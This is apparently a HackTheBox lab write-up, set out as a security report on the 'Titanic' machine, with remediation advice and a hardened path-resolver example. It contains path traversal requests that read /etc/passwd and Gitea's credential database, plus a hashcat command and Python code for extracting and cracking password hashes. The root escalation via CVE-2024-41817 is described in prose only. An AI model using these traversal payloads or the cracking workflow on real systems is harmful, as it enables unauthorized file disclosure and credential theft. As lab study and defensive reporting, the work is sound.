Technical Report
Detailed analysis for technical teams, covering methodologies, tools, and findings.
Technical Security Report: "Titanic" System
Purpose of the Report
This document provides a detailed technical assessment of the Titanic machine from HackTheBox. The goal of this assessment was to identify security vulnerabilities, exploit them, and provide recommendations to mitigate potential risks.
Methodology
The security evaluation followed a structured penetration testing approach:
Reconnaissance: Identifying open ports and services using scanning tools.
Enumeration: Gathering information on the web application and system configuration.
Exploitation: Utilizing known vulnerabilities to gain unauthorized access.
Privilege Escalation: Escalating privileges to gain root access to the system.
Detailed Findings
1. Reconnaissance
Tool Used: nmap
Command Executed:
sudo nmap -F -T5 -sCV <ip_target>
Results:
Port 22/tcp: open, OpenSSH 8.9p1 (Ubuntu 3ubuntu0.10)
Port 80/tcp: open, Apache httpd 2.4.52
Note: -F limits the scan to the 100 most common ports and -T5 is aggressive enough to drop probes on a slow link, so a full TCP port scan should be run afterwards to confirm that no other services are exposed.
2. Enumeration
Web Enumeration:
Accessing http://<ip_target>:80 redirected to titanic.htb. The hostname was added to /etc/hosts (<ip_target> titanic.htb) so that the virtual host resolved correctly.
Navigating the website revealed a functional "Book Your Trip" form; submitting it generated a JSON file.
Directory Bruteforcing:
Tool Used: gobuster
Command Executed:
gobuster dir -u http://titanic.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Results: Found the /download and /book endpoints.
3. Exploitation
Path Traversal / Arbitrary File Read (reported as Local File Inclusion, LFI):
The /download endpoint placed the ticket parameter into a filesystem path without validation. Requesting /download?ticket=../../../../etc/passwd returned the contents of /etc/passwd, confirming arbitrary file read with the privileges of the web application. No server-side code was executed, so this is strictly a traversal / file disclosure issue rather than a true file inclusion, but the impact here was the same: any file readable by the application user could be retrieved.
Retrieving /etc/hosts through the same endpoint revealed the dev.titanic.htb virtual host. After adding it to the local /etc/hosts, dev.titanic.htb served a Gitea instance. Registering a test account gave access to a repository containing MySQL credentials.
The MySQL credentials could not be used to reach the database, so enumeration continued through the file read. Gitea's SQLite database was retrieved via /download?ticket=/home/developer/gitea/data/gitea/gitea.db.
From the user table in gitea.db (columns passwd, salt and passwd_hash_algo), the developer user's PBKDF2 hash and salt were extracted, converted into hashcat's format (sha256:<iterations>:<base64 salt>:<base64 hash>), and cracked with hashcat mode 10900 (PBKDF2-HMAC-SHA256) against rockyou.txt.
Hashcat Command:
hashcat -m 10900 hashdeveloper.txt /usr/share/wordlists/rockyou.txt
The recovered password gave shell access as developer, the starting point for the privilege escalation phase.
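The conversion step between the gitea.db record and the hashcat command above is easy to get wrong (the salt stored in the database is hex, but both hashcat and Gitea itself use its decoded bytes). The following is an added example, not code from the report or from Gitea, that reproduces Gitea's PBKDF2 scheme, turns a user row into a mode-10900 line, and verifies a candidate password offline. The user record, salt and password are constructed for the example; the real values from the target's gitea.db are not on this page.

```python
import base64
import hashlib
import hmac
import sqlite3

# Constructed sample data, modelled on the `user` table in Gitea's SQLite
# database (relevant columns: name, passwd, salt, passwd_hash_algo). The real
# values from the target's gitea.db are not reproduced; the record is generated
# from an assumed password so the conversion and the check can be verified.
SAMPLE_NAME = "developer"
SAMPLE_SALT_HEX = "00112233445566778899aabbccddeeff"   # Gitea stores the salt hex-encoded
SAMPLE_ALGO = "pbkdf2$50000$50"   # Gitea default: PBKDF2-HMAC-SHA256, 50000 rounds, 50-byte key
SAMPLE_PASSWORD = "correct horse battery staple"       # assumed; used only to build the sample


def parse_algo(algo):
    """Parse Gitea's passwd_hash_algo value 'pbkdf2$<iterations>$<keylen>'."""
    name, iterations, keylen = algo.split("$")
    if name != "pbkdf2":
        raise ValueError("unsupported Gitea hash algorithm: " + name)
    return int(iterations), int(keylen)


def gitea_pbkdf2(password, salt_hex, algo):
    """Reproduce Gitea's PBKDF2 scheme: the hex salt is decoded to raw bytes
    before use, and the derived key is stored hex-encoded in `passwd`."""
    iterations, keylen = parse_algo(algo)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                  bytes.fromhex(salt_hex), iterations, keylen)
    return derived.hex()


def to_hashcat_10900(passwd_hex, salt_hex, algo):
    """Convert one record into hashcat's -m 10900 format:
    sha256:<iterations>:<base64 salt>:<base64 hash>."""
    iterations, _ = parse_algo(algo)
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode("ascii")
    hash_b64 = base64.b64encode(bytes.fromhex(passwd_hex)).decode("ascii")
    return "sha256:%d:%s:%s" % (iterations, salt_b64, hash_b64)


def verify_password(candidate, passwd_hex, salt_hex, algo):
    """Check a candidate offline, e.g. to confirm a cracked result before
    using it against the live SSH service."""
    return hmac.compare_digest(gitea_pbkdf2(candidate, salt_hex, algo), passwd_hex)


def build_sample_db():
    """In-memory stand-in for gitea.db holding only the columns used here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, passwd TEXT, salt TEXT, passwd_hash_algo TEXT)")
    conn.execute("INSERT INTO user VALUES (?, ?, ?, ?)",
                 (SAMPLE_NAME, gitea_pbkdf2(SAMPLE_PASSWORD, SAMPLE_SALT_HEX, SAMPLE_ALGO),
                  SAMPLE_SALT_HEX, SAMPLE_ALGO))
    return conn


def dump_hashcat_lines(conn):
    """Return {username: hashcat line} for every user in the database. The same
    query works against a real gitea.db opened with sqlite3.connect(path)."""
    rows = conn.execute("SELECT name, passwd, salt, passwd_hash_algo FROM user")
    return {name: to_hashcat_10900(passwd, salt, algo) for name, passwd, salt, algo in rows}


if __name__ == "__main__":
    for user, line in dump_hashcat_lines(build_sample_db()).items():
        # write `line` to a file and run: hashcat -m 10900 <file> rockyou.txt
        print(user, line)
```

Point dump_hashcat_lines() at the downloaded gitea.db and write the line for developer to hashdeveloper.txt; the salt field of the generated line must decode to the same bytes Gitea uses, otherwise hashcat will run for the full wordlist and never match.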
4. Privilege Escalation
Enumerating /opt revealed the script identify_images.sh, which invokes an ImageMagick binary. The installed ImageMagick build was vulnerable to CVE-2024-41817: the AppImage build sets MAGICK_CONFIGURE_PATH and LD_LIBRARY_PATH with an empty path component, so ImageMagick loads configuration files or shared libraries from the current working directory when it runs. The issue is fixed in ImageMagick 7.1.1-36; the installed version should be checked against that release.
Because the script was executed with root privileges, a malicious shared library placed in the directory ImageMagick ran from was loaded by the binary and executed arbitrary commands as root.
Executing the payload yielded a root shell and the root flag.
Recommendations
Short-term Actions:
Fix the /download endpoint: resolve the requested ticket to a canonical absolute path and confirm it stays inside the intended download directory, or look tickets up by an identifier instead of a client-supplied filename.
Rotate the developer password and the MySQL credentials committed to the Gitea repository, and keep secrets out of version control.
Enforce a strong password policy (the cracked password was present in rockyou.txt) and use multi-factor authentication where the service supports it.
Update ImageMagick to a release that fixes CVE-2024-41817, and ensure privileged scripts such as /opt/identify_images.sh never invoke it from a directory that a lower-privileged user can write to.
Long-term Actions:
Conduct regular security assessments and code reviews.
Implement network segmentation to isolate sensitive services; the development Gitea instance (dev.titanic.htb) should not be reachable through the public site, and self-registration should be restricted.
Train staff on secure coding and vulnerability mitigation, with emphasis on input validation and secrets handling.
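To make the first short-term action concrete, the following added example (not the Titanic application's code, which is not reproduced on this page) shows the join-without-validation pattern behind the /download finding next to a hardened resolver. The ticket directory /opt/app/tickets and the ticket naming scheme (32 hex characters plus .json) are assumptions for the example.

```python
import os
import re

# Hypothetical location of the generated ticket files; the directory the real
# application uses is not stated in the report.
TICKET_DIR = "/opt/app/tickets"

# Hypothetical naming scheme for generated tickets: 32 hex characters + ".json".
TICKET_NAME = re.compile(r"[0-9a-f]{32}\.json")


def vulnerable_resolve(ticket):
    """The pattern behind the finding: the `ticket` parameter is joined straight
    onto the directory. os.path.join discards the base entirely when the
    parameter is absolute, and "../" segments walk out of it."""
    return os.path.normpath(os.path.join(TICKET_DIR, ticket))


def safe_resolve(ticket):
    """Hardened resolver: returns the path to serve, or None to reject."""
    # 1. Accept only a bare ticket filename: no separators, no traversal,
    #    no absolute paths. Everything else is rejected before touching the FS.
    if not TICKET_NAME.fullmatch(ticket):
        return None
    # 2. Canonicalise both sides and require containment. realpath also follows
    #    symlinks, so a ticket file that links outside the directory is rejected
    #    even though its name passed step 1.
    base = os.path.realpath(TICKET_DIR)
    target = os.path.realpath(os.path.join(base, ticket))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def compare(payloads):
    """Side-by-side view of what each resolver does with a list of inputs."""
    return {p: (vulnerable_resolve(p), safe_resolve(p)) for p in payloads}


if __name__ == "__main__":
    # The two payloads from the finding plus one legitimate ticket name.
    for ticket, (bad, good) in compare([
        "../../../../etc/passwd",
        "/home/developer/gitea/data/gitea/gitea.db",
        "0123456789abcdef0123456789abcdef.json",
    ]).items():
        print("%-45s vulnerable -> %s | safe -> %s" % (ticket, bad, good))
```

The allowlist check alone would already block both payloads from the report; the containment check is kept because it also covers symlinks and any future loosening of the name pattern.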
Conclusion
The assessment of the Titanic machine demonstrated a chain of weaknesses: an unauthenticated path traversal in the web application that exposed arbitrary files, credentials stored in a Git repository and a crackable password hash in Gitea's database, and a vulnerable ImageMagick build invoked by a privileged script. Addressing these issues through input validation, secrets management, stronger authentication, and timely patching will significantly enhance the system's security posture and reduce the risk of exploitation.